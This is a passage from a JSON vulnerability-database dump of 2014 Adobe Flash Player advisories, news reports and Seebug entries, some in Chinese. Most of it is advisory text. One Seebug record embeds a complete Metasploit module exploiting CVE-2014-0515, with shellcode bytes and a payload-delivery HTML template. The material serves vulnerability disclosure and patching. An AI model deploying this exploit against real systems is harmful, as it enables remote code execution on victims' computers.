earlier versions that could cause a crash and potentially allow an attacker to remotely take control of the affected system. This update resolves a stack overflow vulnerability that could result in arbitrary code execution (CVE-2014-0498). This update resolves a memory leak vulnerability that could be used to defeat memory address layout randomization (CVE-2014-0499). This update resolves a double free vulnerability that could result in arbitrary code execution (CVE-2014-0502). Adobe is aware of reports that CVE-2014-0502 is being exploited in the wild. \n", "cvss3": {}, "published": "2014-02-21T18:20:39", "type": "mageia", "title": "Updated flash-player-plugin package fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502"], "modified": "2014-02-21T18:20:39", "id": "MGASA-2014-0091", "href": "https://advisories.mageia.org/MGASA-2014-0091.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-20T15:33:34", "description": "Adobe Flash Player 11.2.202.346 contains fixes to important vulnerabilities found in earlier versions that could allow a remote attacker to bypass security restrictions or to access sensitive information. This update resolves a vulnerability that could be used to bypass the same origin policy (CVE-2014-0503). This update resolves a vulnerability that could be used to read the contents of the clipboard (CVE-2014-0504). \n", "cvss3": {}, "published": "2014-03-12T16:22:25", "type": "mageia", "title": "Updated flash-player-plugin packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2014-03-12T16:22:25", "id": "MGASA-2014-0128", "href": "https://advisories.mageia.org/MGASA-2014-0128.html", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-09-20T15:33:34", "description": "Adobe Flash Player 11.2.202.356 contains a fix to a critical security vulnerability found in earlier versions that could potentially allow an attacker to take control of the affected system. This update resolves a buffer overflow vulnerability that could result in arbitrary code execution (CVE-2014-0515). \n", "cvss3": {}, "published": "2014-04-30T14:31:23", "type": "mageia", "title": "Updated flash-player-plugin package fixes CVE-2014-0515\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0515"], "modified": "2014-04-30T14:31:23", "id": "MGASA-2014-0198", "href": "https://advisories.mageia.org/MGASA-2014-0198.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:17:39", "description": "[](<https://4.bp.blogspot.com/--507JkCFoZA/UwhC21o6XWI/AAAAAAAAaRw/G5qvKdfg_Sg/s1600/Adobe+Flash+Palayer+emergency+patch+update.png>)\n\nSecurity Firm FireEye has [uncovered](<https://www.fireeye.com/blog/technical/targeted-attack/2014/02/operation-greedywonk-multiple-economic-and-foreign-policy-sites-compromised-serving-up-flash-zero-day-exploit.html>) yet another critical zero-day vulnerability in widely used Adobe Flash Software and Adobe has been forced to issue a second [emergency patch update](<https://helpx.adobe.com/security/products/flash-player/apsb14-07.html>) in less than a month. \n \nAll versions of Adobe Flash Player released before today's patch are vulnerable to the zero-day exploit and the patch addresses a critical vulnerability _CVE-2014-0502_, being used in a watering hole attack -dubbed \"_Operation Greedywonk\", _that allows attackers to remotely take control of infected systems. \n \nThe vulnerability affects the latest versions of Flash, is reported to be targeting the websites of three non-profit institutions, being redirected to an malicious server hosting the zero-day exploit. \n \n\"_Visitors to the Peter G. Peterson Institute for International Economics (www.piie[.]com) were redirected to an exploit server hosting this Flash zero-day through a hidden iframe_.\" FireEye said. \n \n\n\nSecurity updates tackle a number of flaws including: \n\n\n * CVE-2014-0498 stack overflow vulnerability, if exploited, can execute arbitrary code\n * CVE-2014-0499 memory leak vulnerability, if exploited, defeat memory address layout randomization\n * CVE-2014-0502 double free vulnerability, if exploited, could result in arbitrary code execution\nReports confirmed that exploit for _CVE-2014-0502_ exists in the wild, that allows an attacker to bypass '_Address Space Layout Randomization (ASLR)_' protections on Windows XP, Windows 7 with Java version 1.6 or outdated office 2007 or 2010 to execute the malicious code.\n\n \n**Anatomy of the attack:** Antivirus firm** '**[Symantec](<http://www.symantec.com/connect/blogs/new-flash-zero-day-linked-yet-more-watering-hole-attacks>)' explained:\n\n> **\"**_This attack technique is known as a watering hole attack. In this case the target visits a compromised website that contains an IFrame inserted by the attackers in order to redirect the target to another website (giftserv.hopto.org). This new site loads a malicious index.php file (Trojan.Malscript) which checks whether the victim is running a 32-bit or 64-bit system. Depending on the results, a malicious index.html file (also Trojan.Malscript) and additional components are also downloaded from either the 32-bit or 64-bit folders hosted on the attacker\u2019s server. The malicious index.html file then loads the cc.swf Adobe Flash file (Trojan.Swifi) containing the zero-day. Once exploited, a logo.gif image file is downloaded containing encrypted shellcode which downloads and executes the malicious server.exe (Backdoor.Jolob) payload_.\n\nA very successful watering hole attack in early 2013 targeted mobile app developers and infected the internal networks of Apple, Facebook, Microsoft and Twitter, among other companies. \n \nFortunately, only certain computers are vulnerable to those further exploits: all Windows XP machines, and Windows 7 machines that have Java 1.6 or Microsoft Office 2007 or 2010 installed. \"_Users can mitigate the threat by upgrading from Windows XP and updating Java and Office,_\" FireEye researchers said. \n \nTo Determine which version of Flash you are running, you can visit Adobe\u2019s [website here](<https://www.adobe.com/software/flash/about/>). Users are recommended to update their Adobe Flash layer to address this critical vulnerability. You should download it from the [Adobe Flash Player Download](<https://get.adobe.com/flashplayer/>) Centre.\n", "cvss3": {}, "published": "2014-02-21T19:36:00", "type": "thn", "title": "Adobe releases another Emergency Security Patch for Flash Player", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0502", "CVE-2014-0499"], "modified": "2014-02-22T06:36:51", "id": "THN:F302CDA9688F8F9725A0957D7EE3FB30", "href": "https://thehackernews.com/2014/02/adobe-releases-another-emergency.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:58", "description": "[](<https://3.bp.blogspot.com/-E_ub3dXk4QM/Ux88XhB2NWI/AAAAAAAAaiE/5llUerdHQcA/s1600/adobe-flash-player.jpg>)\n\nAdobe has released security updates to address important vulnerabilities in [Adobe Flash Player](<https://thehackernews.com/search/label/Adobe%20Flash%20Player>) 12.0.0.70 and earlier versions for Windows and Macintosh and Adobe Flash Player 11.2.202.341 and earlier versions for Linux. \n\n\n \n\n\nThe new build intends to address following vulnerabilities in Adobe Flash Player:\n\n * _**CVE-2014-0503**,_ reported by security researcher, '_Masato Kinugawa_', that lets_ _attackers bypass the same-origin policy. Attackers can exploit this issue to access resources from another origin in the context of another domain. This can facilitate cross-site request-forgery attacks.\n * **CVE-2014-0504**, reported by '_Jordan Milne_',** **that could be used to read the contents of the clipboard(). The Clipboard can be used to store data, such as text and images, but flaw could allow hacker to stuff malware URLs onto your clipboard.\n\nAdobe Security Bulletin [APSB14-08](<https://helpx.adobe.com/security/products/flash-player/apsb14-08.html>) tagged the updates with **Priority 2**, '_This update resolves vulnerabilities in a product that has historically been at elevated risk. There are currently no known exploits._'\n\n[](<https://3.bp.blogspot.com/-ucGdISLzv6M/Ux824VFG-EI/AAAAAAAAahs/-sxRbOXccnM/s1600/Adobe-Flash-Player-download.png>)\n\nAdobe recommends users to update their software installations to Adobe Flash player 12.0.0.77 i.e. Available for [download from Abobe Center](<https://www.adobe.com/go/getflash>).\n", "cvss3": {}, "published": "2014-03-11T05:45:00", "type": "thn", "title": "Adobe releases important Security Updates for Flash Player", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-0503", "CVE-2014-0504"], "modified": "2014-03-11T16:45:22", "id": "THN:16D1A0509FDE824EA23D52FEEC5FBBBD", "href": "https://thehackernews.com/2014/03/adobe-releases-important-security.html", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T17:27:35", "description": "CVE ID:CVE-2014-0509 \r\n\r\nAdobe Flash Player\u662f\u4e00\u6b3eFlash\u6587\u4ef6\u5904\u7406\u7a0b\u5e8f\u3002Adobe Air\u662f\u4e00\u6b3eAdobe\u516c\u53f8\u51fa\u54c1\u7684\u8de8\u64cd\u4f5c\u7cfb\u7edf\u7684\u8fd0\u884c\u65f6\u5e93\u3002\r\n\r\nAdobe Flash Player/AIR\u5b58\u5728\u672a\u660e\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e\uff0c\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u6ce8\u5165\u6076\u610f\u811a\u672c\u6216HTML\u4ee3\u7801\uff0c\u5f53\u6076\u610f\u6570\u636e\u88ab\u67e5\u770b\u65f6\uff0c\u53ef\u83b7\u53d6\u654f\u611f\u4fe1\u606f\u6216\u52ab\u6301\u7528\u6237\u4f1a\u8bdd\u3002\n0\nAdobe Flash Player 12.0.0.77\r\nAdobe Flash Player 11.2.202.346\r\nAdobe Flash Player 11.7.700.272\r\nAdobe AIR 4.0.0.1628\nAdobe Flash Player 13.0.0.182, 11.2.202.350\u6216Adobe AIR 13.0.0.83\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.adobe.com", "cvss3": {}, "published": "2014-04-11T00:00:00", "title": "Adobe Flash Player/AIR\u672a\u660e\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0509"], "modified": "2014-04-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62134", "id": "SSV:62134", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T13:46:20", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Adobe Flash Player Shader Buffer Overflow", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86558", "id": "SSV:86558", "sourceData": "\n ##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => "Adobe Flash Player Shader Buffer Overflow",\r\n 'Description' => %q{\r\n This module exploits a buffer overflow vulnerability in Adobe Flash Player. The\r\n vulnerability occurs in the flash.Display.Shader class, when setting specially\r\n crafted data as its bytecode, as exploited in the wild in April 2014. This module\r\n has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over\r\n Windows XP SP3, Windows 7 SP1 and Windows 8.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Vulnerability discovery and exploit in the wild\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-0515'],\r\n ['BID', '67092'],\r\n ['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'],\r\n ['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'],\r\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 2000,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => stack_adjust\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'Retries' => false,\r\n 'EXITFUNC' => "thread"\r\n },\r\n 'Platform' => 'win',\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :clsid => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",\r\n :method => "LoadMovie",\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :ua_name => Msf::HttpClients::IE,\r\n :flash => lambda { |ver| ver =~ /^11\\./ || ver =~ /^12\\./ || (ver =~ /^13\\./ && ver <= '13.0.0.182') }\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => "Apr 28 2014",\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n\r\n def stack_adjust\r\n adjust = "\\x64\\xa1\\x18\\x00\\x00\\x00" # mov eax, fs:[0x18 # get teb\r\n adjust << "\\x83\\xC0\\x08" # add eax, byte 8 # get pointer to stacklimit\r\n adjust << "\\x8b\\x20" # mov esp, [eax] # put esp at stacklimit\r\n adjust << "\\x81\\xC4\\x30\\xF8\\xFF\\xFF" # add esp, -2000 # plus a little offset\r\n\r\n adjust\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status("Request: #{request.uri}")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status("Sending SWF...")\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status("Sending HTML...")\r\n tag = retrieve_tag(cli, request)\r\n profile = get_profile(tag)\r\n profile[:tried] = false unless profile.nil? # to allow request the swf\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"\r\n flash_payload = ""\r\n get_payload(cli,target_info).unpack("V*").each do |i|\r\n flash_payload << "0x#{i.to_s(16)},"\r\n end\r\n flash_payload.gsub!(/,$/, "")\r\n\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />\r\n <param name="movie" value="<%=swf_random%>" />\r\n <param name="allowScriptAccess" value="always" />\r\n <param name="FlashVars" value="sh=<%=flash_payload%>" />\r\n <param name="Play" value="true" />\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0515", "Graph.swf" )\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\n\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-86558", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:27:36", "description": "CVE ID:CVE-2014-0508\r\n\r\nAdobe Flash Player\u662f\u4e00\u6b3eFlash\u6587\u4ef6\u5904\u7406\u7a0b\u5e8f\u3002Adobe Air\u662f\u4e00\u6b3eAdobe\u516c\u53f8\u51fa\u54c1\u7684\u8de8\u64cd\u4f5c\u7cfb\u7edf\u7684\u8fd0\u884c\u65f6\u5e93\u3002\r\n\r\nAdobe Flash Player/AIR\u5b58\u5728\u672a\u660e\u5b89\u5168\u6f0f\u6d1e\uff0c\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u6784\u5efa\u6076\u610f\u6587\u4ef6\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u7ed5\u8fc7\u5b89\u5168\u9650\u5236\uff0c\u83b7\u53d6\u654f\u611f\u4fe1\u606f\u3002\n0\nAdobe Flash Player 12.0.0.77\r\nAdobe Flash Player 11.2.202.346\r\nAdobe Flash Player 11.7.700.272\r\nAdobe AIR 4.0.0.1628\nAdobe Flash Player 13.0.0.182, 11.2.202.350\u6216Adobe AIR 13.0.0.83\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.adobe.com", "cvss3": {}, "published": "2014-04-11T00:00:00", "title": "Adobe Flash Player/AIR\u672a\u660e\u5b89\u5168\u7ed5\u8fc7\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0508"], "modified": "2014-04-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62133", "id": "SSV:62133", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:27:40", "description": "CVE ID:CVE-2014-0507\r\n\r\nAdobe Flash Player\u662f\u4e00\u6b3eFlash\u6587\u4ef6\u5904\u7406\u7a0b\u5e8f\u3002Adobe Air\u662f\u4e00\u6b3eAdobe\u516c\u53f8\u51fa\u54c1\u7684\u8de8\u64cd\u4f5c\u7cfb\u7edf\u7684\u8fd0\u884c\u65f6\u5e93\u3002\r\n\r\nAdobe Flash Player/AIR\u5b58\u5728\u672a\u660e\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u5141\u8bb8\u8fdc\u7a0b\u653b\u51fb\u8005\u6784\u5efa\u6076\u610f\u6587\u4ef6\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u4f7f\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\u6216\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\n0\nAdobe Flash Player 12.0.0.77\r\nAdobe Flash Player 11.2.202.346\r\nAdobe Flash Player 11.7.700.272\r\nAdobe AIR 4.0.0.1628\nAdobe Flash Player 13.0.0.182, 11.2.202.350\u6216Adobe AIR 13.0.0.83\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.adobe.com", "cvss3": {}, "published": "2014-04-11T00:00:00", "title": "Adobe Flash Player/AIR\u672a\u660e\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0507"], "modified": "2014-04-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62132", "id": "SSV:62132", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:33:40", "description": "BUGTRAQ ID: 65704\r\nCVE(CAN) ID: CVE-2014-0498\r\n\r\nAdobe Flash Player\u662f\u4e00\u4e2a\u96c6\u6210\u7684\u591a\u5a92\u4f53\u64ad\u653e\u5668\u3002Adobe AIR\u662f\u9488\u5bf9\u7f51\u7edc\u4e0e\u684c\u9762\u5e94\u7528\u7684\u7ed3\u5408\u6240\u5f00\u53d1\u51fa\u6765\u7684\u6280\u672f\uff0c\u53ef\u4ee5\u4e0d\u5fc5\u7ecf\u7531\u6d4f\u89c8\u5668\u800c\u5bf9\u7f51\u7edc\u4e0a\u7684\u4e91\u7aef\u7a0b\u5f0f\u505a\u63a7\u5236\u3002\r\n\r\nAdobe Flash Player\u53caAIR\u5728\u5904\u7406\u542b\u6709\u7279\u5236Flash\u5185\u5bb9\u7684\u6076\u610f\u7f51\u9875\u65f6\u5b58\u5728\u591a\u4e2a\u6f0f\u6d1e\uff0c\u5305\u62ec\u6808\u6ea2\u51fa\u3001\u5185\u5b58\u6cc4\u9732\u3001\u53cc\u91cd\u91ca\u653e\u6f0f\u6d1e\uff0c\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8fd9\u6f0f\u6d1e\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u6700\u7ec8\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7cfb\u7edf\u3002\r\n0\r\nAdobe Flash Player < 12.0.0.44\r\nAdobe Flash Player < 11.2.202.336\r\nAdobe AIR 4.0.0.1390\r\nAdobe AIR 3.9.0.1390 SDK\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nAdobe\r\n-----\r\nAdobe\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08apsb14-07\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\napsb14-07\uff1aSecurity updates available for Adobe Flash Player\r\n\u94fe\u63a5\uff1ahttp://helpx.adobe.com/security/products/flash-player/apsb14-07.html", "cvss3": {}, "published": "2014-02-21T00:00:00", "type": "seebug", "title": "Adobe Flash Player\u53caAIR\u8fdc\u7a0b\u6808\u6ea2\u51fa\u6f0f\u6d1e(CVE-2014-0498)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0498"], "modified": "2014-02-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61526", "id": "SSV:61526", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:30:35", "description": "CVE(CAN) ID: CVE-2014-0506\r\n\r\nAdobe Flash Player\u662f\u4e00\u4e2a\u96c6\u6210\u7684\u591a\u5a92\u4f53\u64ad\u653e\u5668\u3002\r\n\r\nAdobe Flash Player 12.0.0.77 (Windows)\u7248\u672c\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u91ca\u653e\u540e\u91cd\u5229\u7528\u5b89\u5168\u6f0f\u6d1e\uff0c\u53ef\u4f7f\u653b\u51fb\u8005\u5229\u7528\u6b64\u6f0f\u6d1e\u7ed5\u8fc7IE\u6c99\u76d2\u4fdd\u62a4\u673a\u5236\u5e76\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n0\r\nAdobe Flash Player 12.0.0.77\r\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01\u6216\u8005\u5347\u7ea7\u7a0b\u5e8f\uff0c\u6211\u4eec\u5efa\u8bae\u4f7f\u7528\u6b64\u8f6f\u4ef6\u7684\u7528\u6237\u968f\u65f6\u5173\u6ce8\u5382\u5546\u7684\u4e3b\u9875\u4ee5\u83b7\u53d6\u6700\u65b0\u7248\u672c\uff1a\r\nhttp://www.adobe.com/support/security/", "cvss3": {}, "published": "2014-03-28T00:00:00", "title": "Adobe Flash Player\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0506"], "modified": "2014-03-28T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61978", "id": "SSV:61978", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:32:54", "description": "BUGTRAQ ID: 65703\r\nCVE(CAN) ID: CVE-2014-0499\r\n\r\nAdobe Flash Player\u662f\u4e00\u4e2a\u96c6\u6210\u7684\u591a\u5a92\u4f53\u64ad\u653e\u5668\u3002Adobe AIR\u662f\u9488\u5bf9\u7f51\u7edc\u4e0e\u684c\u9762\u5e94\u7528\u7684\u7ed3\u5408\u6240\u5f00\u53d1\u51fa\u6765\u7684\u6280\u672f\uff0c\u53ef\u4ee5\u4e0d\u5fc5\u7ecf\u7531\u6d4f\u89c8\u5668\u800c\u5bf9\u7f51\u7edc\u4e0a\u7684\u4e91\u7aef\u7a0b\u5f0f\u505a\u63a7\u5236\u3002\r\n\r\nAdobe Flash Player\u53caAIR\u5728\u5904\u7406\u542b\u6709\u7279\u5236Flash\u5185\u5bb9\u7684\u6076\u610f\u7f51\u9875\u65f6\u5b58\u5728\u591a\u4e2a\u6f0f\u6d1e\uff0c\u5305\u62ec\u6808\u6ea2\u51fa\u3001\u5185\u5b58\u6cc4\u9732\u3001\u53cc\u91cd\u91ca\u653e\u6f0f\u6d1e\uff0c\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8fd9\u6f0f\u6d1e\u83b7\u53d6\u654f\u611f\u4fe1\u606f\uff0c\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u6700\u7ec8\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7cfb\u7edf\u3002\r\n0\r\nAdobe Flash Player < 12.0.0.44\r\nAdobe Flash Player < 11.2.202.336\r\nAdobe AIR 4.0.0.1390\r\nAdobe AIR 3.9.0.1390 SDK\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nAdobe\r\n-----\r\nAdobe\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08apsb14-07\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\napsb14-07\uff1aSecurity updates available for Adobe Flash Player\r\n\u94fe\u63a5\uff1ahttp://helpx.adobe.com/security/products/flash-player/apsb14-07.html", "cvss3": {}, "published": "2014-02-21T00:00:00", "title": "Adobe Flash Player\u53caAIR\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e(CVE-2014-0499)", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0499"], "modified": "2014-02-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-61525", "id": "SSV:61525", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:32:41", "description": "BUGTRAQ ID: 65702\r\nCVE(CAN) ID: CVE-2014-0502\r\n\r\nAdobe Flash Player\u662f\u4e00\u4e2a\u96c6\u6210\u7684\u591a\u5a92\u4f53\u64ad\u653e\u5668\u3002Adobe AIR\u662f\u9488\u5bf9\u7f51\u7edc\u4e0e\u684c\u9762\u5e94\u7528\u7684\u7ed3\u5408\u6240\u5f00\u53d1\u51fa\u6765\u7684\u6280\u672f\uff0c\u53ef\u4ee5\u4e0d\u5fc5\u7ecf\u7531\u6d4f\u89c8\u5668\u800c\u5bf9\u7f51\u7edc\u4e0a\u7684\u4e91\u7aef\u7a0b\u5f0f\u505a\u63a7\u5236\u3002\r\n\r\nAdobe Flash Player\u53caAIR\u5728\u5904\u7406\u542b\u6709\u7279\u5236Flash\u5185\u5bb9\u7684\u6076\u610f\u7f51\u9875\u65f6\u5b58\u5728\u591a\u4e2a\u6f0f\u6d1e\uff0c\u5305\u62ec\u6808\u6ea2\u51fa\u3001\u5185\u5b58\u6cc4\u9732\u3001\u53cc\u91cd\u91ca\u653e\u6f0f\u6d1e\uff0c\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u8fd9\u6f0f\u6d1e\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u6700\u7ec8\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7cfb\u7edf\u3002\r\n0\r\nAdobe Flash Player < 12.0.0.44\r\nAdobe Flash Player < 11.2.202.336\r\nAdobe AIR 4.0.0.1390\r\nAdobe AIR 3.9.0.1390 